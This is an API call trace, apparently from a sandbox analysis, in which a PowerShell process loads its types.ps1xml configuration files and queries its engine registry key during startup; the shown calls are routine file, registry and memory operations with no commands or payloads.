	[0345.812] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd3d0 | out: lpFileInformation=0xcd3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0345.812] SetErrorMode (uMode=0x1) returned 0x1
	[0345.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.814] SetErrorMode (uMode=0x1) returned 0x1
	[0345.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3d0 | out: lpFileInformation=0xcd3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0345.814] SetErrorMode (uMode=0x1) returned 0x1
	[0345.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.817] SetErrorMode (uMode=0x1) returned 0x1
	[0345.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3d0 | out: lpFileInformation=0xcd3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0345.817] SetErrorMode (uMode=0x1) returned 0x1
	[0345.817] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.818] CoTaskMemFree (pv=0x34ee80) 
	[0345.818] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.819] CoTaskMemFree (pv=0x34ee80) 
	[0345.819] GetACP () returned 0x4e4
	[0345.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.826] SetErrorMode (uMode=0x1) returned 0x1
	[0345.826] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0345.827] GetFileType (hFile=0x334) returned 0x1
	[0345.827] SetErrorMode (uMode=0x1) returned 0x1
	[0345.827] GetFileType (hFile=0x334) returned 0x1
	[0345.828] ReadFile (in: hFile=0x334, lpBuffer=0x2c3bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3bf80*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0345.829] ReadFile (in: hFile=0x334, lpBuffer=0x2c3bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3bf80*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0345.830] ReadFile (in: hFile=0x334, lpBuffer=0x2c3bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3bf80*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0345.830] ReadFile (in: hFile=0x334, lpBuffer=0x2c3bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3bf80*, lpNumberOfBytesRead=0xcd308*=0xcf3, lpOverlapped=0x0) returned 1
	[0345.830] ReadFile (in: hFile=0x334, lpBuffer=0x2c3b3db, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3b3db*, lpNumberOfBytesRead=0xcd308*=0x0, lpOverlapped=0x0) returned 1
	[0345.830] ReadFile (in: hFile=0x334, lpBuffer=0x2c3bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2c3bf80*, lpNumberOfBytesRead=0xcd308*=0x0, lpOverlapped=0x0) returned 1
	[0345.831] CloseHandle (hObject=0x334) returned 1
	[0345.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.833] SetErrorMode (uMode=0x1) returned 0x1
	[0345.833] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd280 | out: lpFileInformation=0xcd280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0345.834] SetErrorMode (uMode=0x1) returned 0x1
	[0345.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.834] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x334) returned 0x0
	[0345.835] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ec, lpData=0x0, lpcbData=0xcd2e8*=0x0 | out: lpType=0xcd2ec*=0x1, lpData=0x0, lpcbData=0xcd2e8*=0x56) returned 0x0
	[0345.835] CoTaskMemAlloc (cb=0x5a) returned 0x37dca0
	[0345.835] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2bc, lpData=0x37dca0, lpcbData=0xcd2b8*=0x56 | out: lpType=0xcd2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd2b8*=0x56) returned 0x0
	[0345.835] CoTaskMemFree (pv=0x37dca0) 
	[0345.835] RegCloseKey (hKey=0x334) returned 0x0
	[0345.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0345.857] GetSystemInfo (in: lpSystemInfo=0xcbfa0 | out: lpSystemInfo=0xcbfa0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0346.160] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0346.191] SetErrorMode (uMode=0x1) returned 0x1
	[0346.191] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0346.191] GetFileType (hFile=0x334) returned 0x1
	[0346.191] SetErrorMode (uMode=0x1) returned 0x1
	[0346.192] GetFileType (hFile=0x334) returned 0x1
	[0346.192] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.192] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.193] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.193] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.193] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.193] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.193] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.194] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.194] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.195] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.195] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.195] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.195] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.195] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.196] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.196] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.196] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.197] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.198] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.198] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.439] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.440] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.440] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.440] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.440] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.441] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.441] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.441] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.441] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.442] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.442] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.442] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.442] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.445] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.445] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.445] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.446] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.446] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.446] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.446] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.447] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1000, lpOverlapped=0x0) returned 1
	[0346.447] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x1b4, lpOverlapped=0x0) returned 1
	[0346.447] ReadFile (in: hFile=0x334, lpBuffer=0x2b39ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd308, lpOverlapped=0x0 | out: lpBuffer=0x2b39ec8*, lpNumberOfBytesRead=0xcd308*=0x0, lpOverlapped=0x0) returned 1
	[0346.447] CloseHandle (hObject=0x334) returned 1
	[0346.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0346.447] SetErrorMode (uMode=0x1) returned 0x1
	[0346.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd280 | out: lpFileInformation=0xcd280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0346.448] SetErrorMode (uMode=0x1) returned 0x1
	[0346.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0346.448] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x334) returned 0x0
	[0346.448] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ec, lpData=0x0, lpcbData=0xcd2e8*=0x0 | out: lpType=0xcd2ec*=0x1, lpData=0x0, lpcbData=0xcd2e8*=0x56) returned 0x0
	[0346.448] CoTaskMemAlloc (cb=0x5a) returned 0x3591f0
	[0346.448] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2bc, lpData=0x3591f0, lpcbData=0xcd2b8*=0x56 | out: lpType=0xcd2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd2b8*=0x56) returned 0x0
	[0346.448] CoTaskMemFree (pv=0x3591f0) 
	[0346.449] RegCloseKey (hKey=0x334) returned 0x0
	[0346.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0346.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0347.188] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.195] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.196] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.197] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.197] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.197] VirtualQuery (in: lpAddress=0xcc050, lpBuffer=0xccf10, dwLength=0x30 | out: lpBuffer=0xccf10*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
